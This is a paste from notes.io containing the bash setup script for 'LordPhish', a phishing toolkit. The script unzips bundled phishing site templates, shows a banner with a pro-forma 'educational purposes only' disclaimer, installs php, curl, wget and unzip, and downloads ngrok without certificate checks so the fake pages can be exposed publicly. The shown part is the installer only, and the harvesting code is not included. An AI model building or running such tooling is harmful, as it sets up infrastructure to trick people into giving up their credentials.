NotesWhat is notes.io?

Notes brand slogan

Notes - notes.io

#!/usr/bin/env bash

red='e[1;31m'

UnzipFiles(){
command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
printf "e[1;93m [!] Unzipping files ...!e[0mn"
sleep 1.9
nohup unzip sites.zip > /dev/null &
}
smail_banner() {
printf "n"
printf "n"
printf "${red}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&@@@&#B55@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@&&##&&@@@@@@@@@@&@@@@@@@@@@&&&&#&@@@@@@@@&B#@@@@&@@@@@@@&#BB#&@#GYJYJY@@@@@@@@@@@@@@@&#BB#&@
@@@@#GP5YYJ?YJP@@@@@&#B5JJ5G@@@@#G555YJ??YG@@&BPYJ?YBG5YJY@@@@@@&BG5B@@@@&YJ?5&&#BGY555#@@@@@&#G5B@@
@@#JJ#@@@&#5PB&@@@&P5&@&##&@@@BYY&@@@&B5G#@@@&BGYJYJG#GJJJG#&@&G5YJ?#@@@@@5J?JG#&&&B5J?JG@@&GPYJ?B@@
@G??G@&#PYJY5GPP#&JJJYPGGGB&@PJ?B@#GPYJ55PPG&@@@PJ?JGP5YYJJJJB@&GJYJ#@@@@@YJJP@@@@@@&YJJP@@@&GJYJB@@
@J?YYGBBGGBPGB##@@BBBPP5??JJGYJ?YBBGBGPGGB#&@@@@5J?J&@@@&5JJ7B@@GJJ7B@@@@@YY?G@@@@@@&Y?J&@@@@BJY7G@@
"
printf "${red}@J?YYGBBGGBPGB##@@BBBPP5??JJGYJ?YBBGBGPGGB#&@@@@5J?J&@@@&5JJ7B@@GJJ7B@@@@@YY?G@@@@@@&Y?J&@@@@BJY7G@@
@PJJ?JB&@@@@@#B@@@&#@@@@G?JP&57JJYB@@@@@@##@@@@@57?5@@@@@#JJB@@@GJYJ#@@@@&YYJG@@@@@&5YG&@@@@@BJYJB@@
@@#5JJJJJYPPGG#@@P?JYPGGPP#@@@B5Y??YYY5PGG&@@@@@PJJJYPGGGP#@@@@@BJ??#@@@@&YJJB@@@&PYJJY5PG&@@BJ??B@@
@@@@&&####&&@@@@@@#####&@@@@@@@@&#####&&@@@@@@@@&&#BBB#&@@@@@@@@&##&@@@@@@##&@@@@&#&&&###&@@@&##&@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@nn"
printf " e[1;97m .:. Version 2.0 Beta .:. e[0mn"
printf "n"
printf " e[92m[e[37;1m+e[92m]e[0me[33;1m Tool Created by Gr3n0xX/Ch4r0nN e[0mn"
printf "n"
printf " e[101me[1;77m:: Disclaimer: Developers assume no liability and are not ::e[0mn"
printf " e[101me[1;77m:: responsible for any misuse or damage caused by LordPhish. ::e[0mn"
printf " e[101me[1;77m:: Only use for educational purporses!! ::e[0mn"
printf "n"
printf " e[101me[1;77m:: Attacking targets without mutual consent is illegal! ::e[0mn"
printf "n"
}

install() {
echo -e "n[*] Installing required packages..."

if [[ -d "/data/data/com.termux/files/home" ]]; then
if [[ `command -v proot` ]]; then
printf ''
else
echo -e "n[*] Installing package : proot "
pkg install proot resolv-conf -y
fi
fi

if [[ `command -v php` && `command -v wget` && `command -v curl` && `command -v unzip` ]]; then
chmod +x lord.sh
echo -e "n[*] Packages already installed."
else
pkgs=(php curl wget unzip)
for pkg in "${pkgs[@]}"; do
type -p "$pkg" &>/dev/null || {
echo -e "n[*] Installing package : $pkg"
if [[ `command -v pkg` ]]; then
pkg install "$pkg"
elif [[ `command -v apt` ]]; then
apt install "$pkg" -y
elif [[ `command -v apt-get` ]]; then
apt-get install "$pkg" -y
elif [[ `command -v pacman` ]]; then
sudo pacman -S "$pkg" --noconfirm
elif [[ `command -v dnf` ]]; then
sudo dnf -y install "$pkg"
else
echo -e "n[!] Unsupported package manager, Install packages manually."
{ exit 1; }
fi
}
done
fi

}
InstallNgrok(){
if [[ -e ngrok ]]; then
chmod +x ngrok

else
command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
printf "e[1;92m[e[0m*e[1;92m] Downloading Ngrok...n"
arch=$(uname -a | grep -o 'arm' | head -n1)
arch2=$(uname -a | grep -o 'Android' | head -n1)
if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1

if [[ -e ngrok-stable-linux-arm.zip ]]; then
unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-stable-linux-arm.zip
else
printf "e[1;93m[!] Download error... Termux, run:e[0me[1;77m pkg install wgete[0mn"
exit 1
fi

else
wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1
if [[ -e ngrok-stable-linux-386.zip ]]; then
unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-stable-linux-386.zip
else
printf "e[1;93m[!] Download error... e[0mn"
exit 1
fi
fi
fi
}

UnzipFiles
smail_banner
install
InstallNgrok

     
 
what is notes.io
 

Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...

With notes.io;

  • * You can take a note from anywhere and any device with internet connection.
  • * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
  • * You can quickly share your contents without website, blog and e-mail.
  • * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
  • * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.

Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.

Easy: Notes.io doesn’t require installation. Just write and share note!

Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )

Free: Notes.io works for 12 years and has been free since the day it was started.


You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;


Email: [email protected]

Twitter: http://twitter.com/notesio

Instagram: http://instagram.com/notes.io

Facebook: http://facebook.com/notesio



Regards;
Notes.io Team

     
 
Shortened Note Link
 
 
Looding Image
 
     
 
Long File
 
 

For written notes was greater than 18KB Unable to shorten.

To be smaller than 18KB, please organize your notes, or sign in.